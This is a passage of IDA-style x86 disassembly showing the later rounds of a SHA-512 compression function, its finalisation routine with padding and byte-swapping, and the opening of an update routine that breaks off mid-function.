or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A0[eax*8]
adc esi, ds:dword_41F9A4[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_415F71
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_415F80
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_4143D0+1AB0�j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_415F80: ; CODE XREF: sub_4143D0+1B9F�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A8[eax*8]
adc esi, ds:dword_41F9AC[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4161C3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4161D8
; ---------------------------------------------------------------------------
loc_4161C3: ; CODE XREF: sub_4143D0+1CF6�j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4161D8: ; CODE XREF: sub_4143D0+1DF1�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B0[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F9B4[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_41643F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_4143D0+1F7E�j
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416454: ; CODE XREF: sub_4143D0+206D�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B8[eax*8]
adc esi, ds:dword_41F9BC[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_4166A0
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_4166BC
; ---------------------------------------------------------------------------
loc_4166A0: ; CODE XREF: sub_4143D0+21CE�j
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_4166BC: ; CODE XREF: sub_4143D0+22CE�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C0[eax*8]
adc esi, ds:dword_41F9C4[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4168EA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4168FF
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4143D0+2429�j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4168FF: ; CODE XREF: sub_4143D0+2518�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C8[eax*8]
adc esi, ds:dword_41F9CC[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414560
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_4143D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416AE0 proc near ; CODE XREF: .text:00416D62�p
; sub_41B7F9+CA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_416B45
lea edx, [ebx+esi*8+50h]
loc_416AF9: ; CODE XREF: sub_416AE0+5F�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_416AF9
mov ecx, [esp+10h+var_4]
loc_416B45: ; CODE XREF: sub_416AE0+13�j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, dword_4249C0[eax+eax]
mov edi, dword_4249C4[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, dword_424A00[eax]
or edi, dword_424A04[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_416BAA
cmp ecx, 78h
jnb short loc_416B9D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_416B9D: ; CODE XREF: sub_416AE0+A7�j
push ebx
call sub_4143D0
add esp, 4
xor edx, edx
jmp short loc_416BB2
; ---------------------------------------------------------------------------
loc_416BAA: ; CODE XREF: sub_416AE0+A2�j
add edx, 1
cmp edx, 0Eh
jnb short loc_416BD8
loc_416BB2: ; CODE XREF: sub_416AE0+C8�j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_416BD8: ; CODE XREF: sub_416AE0+D0�j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_4143D0
add esp, 4
xor esi, esi
loc_416C25: ; CODE XREF: sub_416AE0+171�j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call sub_4118E0
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_416C25
pop edi
pop esi
pop ebp
pop ecx
retn
sub_416AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_41B7F9+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_416C9B
jb short loc_416C93
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_416C9B
loc_416C93: ; CODE XREF: sub_416C60+2B�j
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
